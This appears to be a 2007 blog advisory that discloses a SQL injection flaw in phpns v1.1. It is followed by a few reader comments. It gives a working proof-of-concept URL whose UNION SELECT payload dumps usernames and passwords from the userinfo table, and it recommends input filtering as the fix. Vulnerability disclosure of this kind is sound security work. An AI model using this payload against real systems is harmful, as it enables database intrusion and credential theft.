Wednesday, August 29, 2007

PHPNS SQL Injection

Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variable is $nid and maybe others.

Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]

Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all null,null,concat(char(117,115,101,114,110,97,109,101,58),
username,char(32,112,97,115,115,119,111,114,100,58),password),
null,null,null from userinfo/*

Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and replyed that they are fixing it.

Posted by SmOk3 at 3:30 AM

Labels: ,

6 comments:

k2o3 said...

É Sempre bom ver tugas nestas andanças, continua o bom trabalho :)

August 29, 2007 7:30 AM
SmOk3 said...

Obrigado pelo feedback k2o3 :)

August 29, 2007 7:54 AM
Anonymous said...
This post has been removed by a blog administrator.
October 21, 2007 4:57 AM
Anonymous said...
This post has been removed by a blog administrator.
November 9, 2007 6:02 AM
lucky said...

Ive read this topic for some blogs. But I think this is more informative.

May 19, 2008 12:26 PM
laptop battery said...

[...]resource[...]

July 16, 2008 7:19 PM

Post a Comment

Subscribe to: Post Comments (Atom)